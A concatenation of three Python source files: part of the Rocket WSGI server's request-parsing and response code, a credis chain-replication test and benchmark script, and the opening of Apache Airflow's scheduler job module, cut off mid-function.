self.err_log.error(msg % status)
except socket.error:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received socket error'
self.err_log.error(msg % status)
def read_request_line(self, sock_file):
self.request_line = ''
try:
# Grab the request line
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
if d == '\r\n':
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug('Client sent newline')
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
except socket.timeout:
raise SocketTimeout('Socket timed out before request.')
except TypeError:
raise SocketClosed(
'SSL bug caused closure of socket. See '
'"https://groups.google.com/d/topic/web2py/P_Gw0JxWzCs".')
d = d.strip()
if not d:
if __debug__:
self.err_log.debug(
'Client did not send a recognizable request.')
raise SocketClosed('Client closed socket.')
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Java's regexp support sucks so bad that it actually takes
# longer in Jython to process the regexp than procedurally. So I've
# left the old code here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response('400 Bad Request')
raise BadRequest
req = match.groupdict()
for k, v in req.iteritems():
if not v:
req[k] = ""
if k == 'path':
req['path'] = r'%2F'.join(
[unquote(x) for x in re_SLASH.split(v)])
self.protocol = req['protocol']
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(' ')
if not proto.startswith('HTTP') or \
proto[-3:] not in ('1.0', '1.1') or \
method not in HTTP_METHODS:
self.send_response('400 Bad Request')
raise BadRequest
except ValueError:
self.send_response('400 Bad Request')
raise BadRequest
req = dict(method=method, protocol=proto)
scheme = ''
host = ''
if uri == '*' or uri.startswith('/'):
path = uri
elif '://' in uri:
scheme, rest = uri.split('://')
host, path = rest.split('/', 1)
path = '/' + path
else:
self.send_response('400 Bad Request')
raise BadRequest
query_string = ''
if '?' in path:
path, query_string = path.split('?', 1)
path = r'%2F'.join([unquote(x) for x in re_SLASH.split(path)])
req.update(path=path,
query_string=query_string,
scheme=scheme.lower(),
host=host)
return req
def read_headers(self, sock_file):
try:
headers = dict()
lname = None
lval = None
while True:
l = sock_file.readline()
if PY3K:
try:
l = str(l, 'ISO-8859-1')
except UnicodeDecodeError:
self.err_log.warning(
'Client sent invalid header: ' + repr(l))
if l.strip().replace('\0', '') == '':
break
if l[0] in ' \t' and lname:
# Some headers take more than one line
lval += ' ' + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(':', 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace('-', '_')
lval = l[-1].strip()
headers[str(lname)] = str(lval)
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
class SocketTimeout(Exception):
"Exception for when a socket times out between requests."
pass
class BadRequest(Exception):
"Exception for when a client sends an incomprehensible request."
pass
class SocketClosed(Exception):
"Exception for when a socket is closed by the client."
pass
class ChunkedReader(object):
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b('')
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b('')
c = self.read(1)
while c and c != b('\n'):
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
def get_method(method):
methods = dict(wsgi=WSGIWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket/worker.py
# Monolithic build...start of module: rocket/methods/__init__.py
# Monolithic build...end of module: rocket/methods/__init__.py
# Monolithic build...start of module: rocket/methods/wsgi.py
# Import System Modules
import sys
import socket
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
if PY3K:
from email.utils import formatdate
else:
# Caps Utils for Py2.4 compatibility
from email.Utils import formatdate
# Define Constants
NEWLINE = b('\r\n')
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
BASE_ENV = {'SERVER_NAME': SERVER_NAME,
'SCRIPT_NAME': '', # Direct call WSGI does not need a name
'wsgi.errors': sys.stderr,
'wsgi.version': (1, 0),
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'wsgi.file_wrapper': FileWrapper
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get('max_threads') != 1
else:
multithreaded = False
self.base_environ = dict(
{'SERVER_SOFTWARE': self.app_info['server_software'],
'wsgi.multithread': multithreaded,
})
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get('wsgi_app')
if not hasattr(self.app, "__call__"):
raise TypeError("The wsgi_app specified (%s) is not a valid WSGI application." % repr(self.app))
# Enable futures
if has_futures and self.app_info.get('futures'):
executor = self.app_info['executor']
self.base_environ.update({"wsgiorg.executor": executor,
"wsgiorg.futures": executor.futures})
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
for k, v in self.read_headers(sock_file).iteritems():
environ[str('HTTP_' + k)] = v
# Add CGI Variables
environ['REQUEST_METHOD'] = request['method']
environ['PATH_INFO'] = request['path']
environ['SERVER_PROTOCOL'] = request['protocol']
environ['SERVER_PORT'] = str(conn.server_port)
environ['REMOTE_PORT'] = str(conn.client_port)
environ['REMOTE_ADDR'] = str(conn.client_addr)
environ['QUERY_STRING'] = request['query_string']
if 'HTTP_CONTENT_LENGTH' in environ:
environ['CONTENT_LENGTH'] = environ['HTTP_CONTENT_LENGTH']
if 'HTTP_CONTENT_TYPE' in environ:
environ['CONTENT_TYPE'] = environ['HTTP_CONTENT_TYPE']
# Save the request method for later
self.request_method = environ['REQUEST_METHOD']
# Add Dynamic WSGI Variables
if conn.ssl:
environ['wsgi.url_scheme'] = 'https'
environ['HTTPS'] = 'on'
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ['SSL_CLIENT_RAW_CERT'] = \
peercert and ssl.DER_cert_to_PEM_cert(peercert)
except Exception:
print sys.exc_info()[1]
else:
environ['wsgi.url_scheme'] = 'http'
if environ.get('HTTP_TRANSFER_ENCODING', '') == 'chunked':
environ['wsgi.input'] = ChunkedReader(sock_file)
else:
environ['wsgi.input'] = sock_file
return environ
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get('Transfer-Encoding', '').lower() == 'chunked'
# Add a Date header if it's not there already
if not 'Date' in h_set:
h_set['Date'] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not 'Server' in h_set:
h_set['Server'] = HTTP_SERVER_SOFTWARE
if 'Content-Length' in h_set:
self.size = int(h_set['Content-Length'])
else:
s = int(self.status.split(' ')[0])
if (s < 200 or s not in (204, 205, 304)) and not self.chunked:
if sections == 1 or self.protocol != 'HTTP/1.1':
# Add a Content-Length header because it's not there
self.size = len(data)
h_set['Content-Length'] = str(self.size)
else:
# If they sent us more than one section, we blow chunks
h_set['Transfer-Encoding'] = 'Chunked'
self.chunked = True
if __debug__:
self.err_log.debug('Adding header...'
'Transfer-Encoding: Chunked')
if 'Connection' not in h_set:
# If the application did not provide a connection header,
# fill it in
client_conn = self.environ.get('HTTP_CONNECTION', '').lower()
if self.environ['SERVER_PROTOCOL'] == 'HTTP/1.1':
# HTTP = 1.1 defaults to keep-alive connections
if client_conn:
h_set['Connection'] = client_conn
else:
h_set['Connection'] = 'keep-alive'
else:
# HTTP < 1.1 supports keep-alive but it's quirky
# so we don't support it
h_set['Connection'] = 'close'
# Close our connection if we need to.
self.closeConnection = h_set.get('Connection', '').lower() == 'close'
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning('WSGI app called write method directly. This is '
'deprecated behavior. Please update your app.')
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = b(self.error[1])
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != 'HEAD':
try:
if self.chunked:
self.conn.sendall(b('%x\r\n%s\r\n' % (len(data), data)))
else:
self.conn.sendall(data)
except socket.timeout:
self.closeConnection = True
except socket.error:
# But some clients will close the connection before that
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
""" Store the HTTP status and headers to be sent when self.write is
called. """
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if PY3K and not isinstance(status, str):
self.status = str(status, 'ISO-8859-1')
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ('500 Internal Server Error',
'HTTP Headers should be bytes')
self.err_log.error('Received HTTP Headers from client that contain'
' invalid characters for Latin-1 encoding.')
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
if PY3K:
sock_file = conn.makefile(mode='rb', buffering=BUF_SIZE)
else:
sock_file = conn.makefile(BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get('HTTP_EXPECT', '') == '100-continue':
res = environ['SERVER_PROTOCOL'] + ' 100 Continue\r\n\r\n'
conn.sendall(b(res))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, '__len__') and not hasattr(output, '__iter__'):
self.error = ('500 Internal Server Error',
'WSGI applications must return a list or '
'generator type.')
if hasattr(output, '__len__'):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if not self.headers_sent:
# Send headers if the body was empty
self.send_headers('', sections)
if self.chunked and self.request_method != 'HEAD':
# If chunked, send our final chunk length
self.conn.sendall(b('0\r\n\r\n'))
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug('Finally closing output and sock_file')
if hasattr(output, 'close'):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket/methods/wsgi.py
|
demo.py
|
import multiprocessing
import time
import numpy as np
import redis
from tests import common
from tests.common import *
ack_client = AckClient()
master_client = MasterClient()
head_client = GetHeadFromMaster(master_client)
act_pubsub = None
# Put() ops can be ignored when failures occur on the servers. Try a few times.
fails_since_last_success = 0
max_fails = 3
ops_completed = multiprocessing.Value('i', 0)
# From redis-py/.../test_pubsub.py.
def wait_for_message(pubsub, timeout=0.1, ignore_subscribe_messages=False):
now = time.time()
timeout = now + timeout
while now < timeout:
message = pubsub.get_message(
ignore_subscribe_messages=ignore_subscribe_messages)
if message is not None:
return message
time.sleep(1e-5) # 10us.
now = time.time()
return None
def Put(i):
global head_client
global ack_pubsub
global fails_since_last_success
i_str = str(i) # Serialize it once.
put_issued = False
for k in range(3): # Try 3 times.
try:
sn = head_client.execute_command("MEMBER.PUT", i_str, i_str)
put_issued = True
break
except redis.exceptions.ConnectionError:
head_client = RefreshHeadFromMaster(master_client) # Blocking.
continue
if not put_issued:
raise Exception("Irrecoverable redis connection issue; put client %s" %
head_client)
# Wait for the ack.
ack = None
good_client = False
for k in range(3): # Try 3 times.
try:
# if k > 0:
# print('k %d pubsub %s' % (k, ack_pubsub.connection))
# NOTE(zongheng): 1e-4 seems insufficient for an ACK to be
# delivered back. 1e-3 has the issue of triggering a retry, but
# then receives an ACK for the old sn (an issue clients will need
# to address). Using 10ms for now.
ack = wait_for_message(ack_pubsub, timeout=1e-2)
good_client = True
break
except redis.exceptions.ConnectionError as e:
_, ack_pubsub = RefreshTailFromMaster(master_client) # Blocking.
continue
if not good_client:
raise Exception("Irrecoverable redis connection issue; ack client %s" %
ack_pubsub.connection)
elif ack is None:
# Connected but an ACK was not received after timeout (the update was
# likely ignored by the store). Retry.
fails_since_last_success += 1
if fails_since_last_success >= max_fails:
raise Exception(
"A maximum of %d update attempts have failed; "
"no acks from the store are received. i = %d, client = %s" %
(max_fails, i, ack_pubsub.connection))
_, ack_pubsub = RefreshTailFromMaster(master_client)
print("%d updates have been ignored since last success, "
"retrying Put(%d) with fresh ack client %s" %
(fails_since_last_success, i, ack_pubsub.connection))
time.sleep(1)
Put(i)
else:
# TODO(zongheng): this is a stringent check. See NOTE above: sometimes
# we can receive an old ACK.
assert int(ack["data"]) == sn
fails_since_last_success = 0
def SeqPut(n, sleep_secs):
"""For i in range(n), sequentially put i->i into redis."""
global ack_client
global ack_pubsub
global ops_completed
ack_client, ack_pubsub = AckClientAndPubsub()
ops_completed.value = 0
latencies = []
for i in range(n):
# if i % 50 == 0:
# print('i = %d' % i)
start = time.time()
Put(i) # i -> i
latencies.append((time.time() - start) * 1e6) # Microsecs.
time.sleep(sleep_secs)
ops_completed.value += 1 # No lock needed.
nums = np.asarray(latencies)
print(
'throughput %.1f writes/sec; latency (us): mean %.5f std %.5f num %d' %
(len(nums) * 1.0 / np.sum(nums) * 1e6, np.mean(nums), np.std(nums),
len(nums)))
# Asserts that the redis state is exactly {i -> i | i in [0, n)}.
def Check(n):
read_client, _ = RefreshTailFromMaster(master_client)
actual = len(read_client.keys(b'*'))
assert actual == n, "Written %d Expected %d" % (actual, n)
for i in range(n):
data = read_client.get(str(i))
assert int(data) == i, i
def test_demo():
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
# Kill / add.
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1)
new_nodes.append(common.AddNode(master_client))
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
chain = [s.split(b':')[-1] for s in chain]
assert chain == [b'6370', b'6372'], 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
print('Total ops %d, completed ops %d' % (n, ops_completed.value))
def test_kaa():
"""Kill, add, add."""
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1)
new_nodes.append(common.AddNode(master_client))
new_nodes.append(common.AddNode(master_client))
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
assert len(chain) == 2 - 1 + len(new_nodes), 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
def test_multi_kill_add():
"""Kill, add a few times."""
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
# Kill / add.
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1) # 6371 dead
new_nodes.append(common.AddNode(master_client)) # 6372
common.KillNode(index=1) # 6372 dead
new_nodes.append(common.AddNode(master_client)) # 6373
common.KillNode(index=0) # 6370 dead, now [6373]
new_nodes.append(common.AddNode(master_client)) # 6374
new_nodes.append(common.AddNode(master_client)) # 6375
# Now [6373, 6374, 6375].
common.KillNode(index=2) # 6375 dead, now [6373, 6374]
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
chain = [s.split(b':')[-1] for s in chain]
assert chain == [b'6373', b'6374'], 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
def test_dead_old_tail_when_adding():
# We set "sleep_secs" to a higher value. So "kill tail", "add node" will
# be trigered without a refresh request from the driver. Master will have
# the following view of its members:
# init: [ live, live ]
# kill: [ live, dead ]
# - master not told node 1 is dead
# Tests that when adding, the master detects & removes the dead node first.
# Launch driver thread.
n = 5
sleep_secs = 1
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
time.sleep(0.1)
common.KillNode(index=1)
proc, _ = common.AddNode(master_client)
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
assert len(chain) == 2 - 1 + 1, 'chain %s' % chain
Check(ops_completed.value)
proc.kill()
def BenchCredis(num_nodes, num_ops, num_clients):
common.Start(chain=common.MakeChain(num_nodes))
time.sleep(0.1)
# TODO(zongheng): ops_completed needs to be changed
assert num_clients == 1
drivers = []
for i in range(num_clients):
drivers.append(
multiprocessing.Process(target=SeqPut, args=(num_ops, 0)))
for driver in drivers:
driver.start()
for driver in drivers:
driver.join()
assert ops_completed.value == num_ops
Check(ops_completed.value)
def BenchVanillaRedis(num_ops):
common.Start(chain=common.MakeChain(1))
time.sleep(0.1)
r = AckClient() # Just use the chain node as a regular redis server.
start = time.time()
for i in range(num_ops):
i_str = str(i) # Serialize once.
r.execute_command('SET', i_str, i_str)
total_secs = time.time() - start
print('throughput %.1f writes/sec; latency (us): mean %.5f std ? num %d' %
(num_ops * 1.0 / total_secs, total_secs * 1e6 / num_ops, num_ops))
if __name__ == '__main__':
# BenchVanillaRedis(num_ops=100000)
BenchCredis(num_nodes=1, num_ops=500000, num_clients=1)
# BenchCredis(num_nodes=2, num_ops=1000000)
# BenchCredis(num_nodes=3, num_ops=100000)
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'parsing_processes')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
